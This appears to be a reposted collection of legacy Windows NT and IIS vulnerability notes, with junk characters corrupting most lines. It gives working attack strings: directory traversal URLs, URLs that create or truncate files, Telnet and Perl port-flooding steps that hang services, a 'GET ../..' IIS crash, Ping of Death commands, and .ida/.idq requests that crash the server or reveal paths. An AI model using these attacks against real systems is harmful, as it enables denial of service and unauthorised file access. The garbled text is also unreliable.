受影響系統(tǒng):4.0,iis 1.0' J% _; n" K' j% ^
A URL such as 'http://www.domain.com/..\..' allows you to browse and download files outside of the webserver content root directory.9 C+ X7 K2 j& h5 ^9 |" `. F
, X4 l; O0 u5 b% o3 H9 j, }6 ~! o- J9 CA URL such as 'http://www.domain.com/scripts..\..\scriptname' allows you to execute the target script.
^, w0 C; L, @0 t/ \
1 i# Q4 T( a% }! Z hBy default user 'Guest' or IUSR_WWW has read access to all files on an NT disk. These files can be browsed, executed or downloaded by wandering guests.
) ~( b$ ` x+ Q; O+ Y7 Y; C' V2 Q4 L" Z* Z+ M
--------------------------------------------------------------------/ Z! |" T" U" ]6 X( O- C! y: C
& m N9 j% _7 L
受影響系統(tǒng):4.0
- u8 g+ V4 {* m ~6 t) l; PA URL such as http://www.domain.com/scripts/exploit.bat>PATH\target.bat will create a file 'target.bat''.
" @* Z. e* v) B6 A" A& f5 p* u
1 m: `1 b* N: b6 p( L+ Z( G8 O! VIf the file 'target.bat' exists, the file will be truncated.
, q" d$ F8 j' }% L
& i/ ~4 ]- D- ~: z \- R; ^3 d+ I# @, W$ l" W5 |' X: \" c
A URL such as http://www.domain.com/scripts/script_name%0A%0D>PATH\target.bat will create an output file 'target.bat''.8 c8 d$ o% I: Y- S/ h: p9 f+ E8 p# A9 X X
% t V+ ^) K2 z. J1 a
---------------------------------------------------------------------- Z; ^8 Q8 Y/ o( ?% s8 ]4 d" S# S
2 P. E* P* z) K: A
受影響系統(tǒng):3.51,4.0$ y( o) p7 d: n3 Q
Multiple service ports (53, 135, 1031) are vunerable to 'confusion'.$ J4 q j: h3 q7 p
3 ^/ m! A* j0 E0 a
The following steps;
% _! g% H: r+ ~9 r) b1 j- R5 Z( I0 J- Y* E( G4 ^
Telnet to an NT 4.0 system on port 135
s# k- `8 g$ | L, A/ P" mType about 10 characters followed by a <CR> 9 Z% [+ z2 M# j6 y- {
Exit Telnet
* v5 m0 X5 s& v( Fresults in a target host CPU utilization of 100%, though at a lower priority than the desktop shell. Multiple services which are confused can result in a locked system./ e+ h! {2 R5 L+ H* W3 s0 ~: [. U7 Y
- i* S$ s# n/ [& Z5 eWhen launched against port 135, NT Task manager on the target host shows RPCSS.EXE using more than usual process time. To clear this the system must be rebooted.* D, m* J [% B7 \) d* a
1 @$ @6 j8 F9 [2 Z8 L$ Z. F2 a7 j! N
The above also works on port 1031 (inetinfo.exe) where IIS services must be restarted.$ C8 G* h9 m, }- S' |0 x3 v3 J
. t7 i$ c6 w$ M9 T$ I* ?If a DNS server is running on the system, this attack against port 53 (dns.exe) will cause DNS to stop functioning.' ^) \7 ^% ~ C9 g" k; R" I
( H6 E$ i5 h9 Y! v, _
The following is modified perl script gleaned from postings in the NTsecurity@iss.net list to test ports on your system (Perl is available from the NT resource kit):8 w8 S/ ~( J: V6 Q
, l% K q( T5 D* `* n/*begin poke code*/+ L- m( q O( j+ V. [0 C
+ {5 k+ m; g: |use Socket;
; I8 V$ v. a' G1 }! x5 Puse FileHandle;5 E4 _$ s5 T. ?5 H+ \' F/ V7 ?
require "chat2.pl";
5 W- x2 ^# T9 j9 h7 ?% ^: W- ?* J& V
2 f/ T+ ]: k1 [( z$systemname = $ARGV[0] && shift;9 N2 P/ W/ R7 m$ L
# p1 o5 E7 { b5 }) ~8 R) X0 j/ g
$verbose = 1; # tell me what you're hitting
! v5 q1 s/ \6 g; ?$knownports = 1; # don't hit known problem ports5 e& [1 x5 S9 g2 z: @& G
for ($port = $0; $port<65535; $port++) 1 a5 V3 G: x9 e" O
{1 S& G' ?) N* l/ C- y! K) i
1 `: ^& m1 A& w H; U2 t6 P
8 W' T! P9 w7 Z8 ~+ Z; V& R7 @5 N
if ($knownports && ($port == 53 || $port == 135 || $port== 1031)) {( k. V/ `3 S3 w8 B# \
next;' H% q$ {4 r* s% i5 C
} x) p8 _$ M9 Z0 J+ W
$fh = chat::open_port($systemname, $port);
5 |+ K6 m5 u- Q+ Lchat::print ($fh,"This is about ten characters or more");* \% E& x+ Q3 Q! a' {+ f
if ($verbose) {
2 Q3 L+ t" t. Xprint "Trying port: $port\n";' S5 l$ E# c/ w2 ^( [* ^# U
}
9 B4 s. u* G/ W8 i+ e. L" N7 O, Gchat::close($fh);
; W( n' h F8 n- B$ O1 o1 e" t1 T# @" R: N! H% O% Y; n
}
- y0 G- r6 {' r$ X2 w% W, U" f
! C; W5 z, W! j( S3 g* f
2 F; k6 b! Q& d: n% G/*end poke code*/
. _4 @/ V$ l0 E& H) N! B6 W
5 d2 g6 t+ |8 y& P* ?3 L) DSave the above text as c:\perl\bin\poke, run like this: C:\perl\bin> perl poke servername
1 O6 Z9 M) u# }1 l7 ~- n, D0 h6 U" z/ M/ B/ l4 ]& o2 r$ {2 |
--------------------------------------------------------------------------------+ r, f& s4 G1 c, K. E
' x* L2 |% h3 M6 G' J+ {' X% u/ C
受影響系統(tǒng):4.0
3 ?$ u2 K J( o( _, f7 G) |2 TUsing a telnet application to get to a webserver via HTTP port 80, and typing "GET ../.." <cr> will crash IIS.
' }& I- l4 v+ r1 u- v; R$ `! f5 c: u6 n3 m' t( `/ {/ O$ \5 O
This attack causes Dr. Watson to display an alert window and to log an error: 4 n) ~4 T& X: a$ G6 U7 F0 o
2 V" j2 I0 Z2 K/ a: @6 |, X3 f; }0 ^( ["The application, exe\inetinfo.dbg, generated an application error The error occurred on date@ time The exception generated was c0000005 at address 53984655 (TCP_AUTHENT::TCP_AUTHENT"
, ^+ _ ?4 E2 s- j& E. ~0 \0 `8 m; g& Y; \3 Z
--------------------------------------------------------------------------------: g2 z8 ^& a9 z% S' p& G) E( x# I
0 i' b7 @, ]/ i J' |
受影響系統(tǒng):3.51,4.0
+ U: h$ d Z) |Large packet pings (PING -l 65527 -s 1 hostname) otherwise known as 'Ping of Death' can cause a blue screen of death on 3.51 systems:9 x/ p1 {- r) \2 K8 O E" z
. C! K1 l1 V+ r8 C( d3 r! q$ G
STOP: 0X0000001E
8 x5 F9 p7 `9 t3 G T! L! \KMODE_EXCEPTION_NOT_HANDLED - TCPIP.SYS
% y. s( f3 e7 [' @8 [) Z1 R; M3 t8 }+ M. i, I* ]( r) L v* V
-OR-
/ T7 c6 x* G/ R3 s* y0 G
/ S. P B Q+ k- r. q. U4 RSTOP: 0x0000000A! I1 L. @. z" B7 h
IRQL_NOT_LESS_OR_EQUAL - TCPIP.SYS
2 I' N9 {8 x+ W" l% u8 Y0 H2 e9 N+ d3 H. R
NT 4.0 is vunerable sending large packets, but does not crash on receiving large packets.; Z$ O, |, k( c2 j1 \6 V# \- w
) X3 P" H/ H% u! _5 A+ Y
--------------------------------------------------------------------------------# b" l0 e$ {3 W8 i
. X7 s" N6 T8 b6 t% W: x8 j6 ^Microsoft IIS 5.0 has problems handling a specific form of URL ending with "ida". The problem can have 2 kinds of results. One possible outcome is that the server responds with a message like "URL String too long"; "Cannot find the specified path" or the like. The other possible result is that the server terminates with an "Access Violation" message (effectively causing a Denial of Service attack against the server). Vulnerable are all IIS versions (up to and including IIS 5.0). When a remote attacker issues a URL request with the malformed URL: http://www.example.com/...[25kb of '.']...ida The server will either crash (causing an effective DoS attack) or report its current directory location (revealing the directory structure).
0 P# V. I d' a$ x# c
6 D% J7 T! S6 m% u--------------------------------------------------------' T2 g {* `: f! n, }: Y- Y6 I
" g. f1 c7 p" v" P# }, j( c: K/ O5 lIIS, Microsoft's Internet Information Server, can be used to reveal the true path of the files (where they physically reside on the local hard drive), by requesting a non-existing file with an IDQ/IDA extension. By requesting a URL such as: http://www.microsoft.com/anything.ida Or: http://www.microsoft.com/anything.idq A remote user will get a response that looks like: 'The IDQ d:\http\anything.idq could not be found' Such a response allows him to gain further knowledge on how the web site is organized and the directory structure of the server |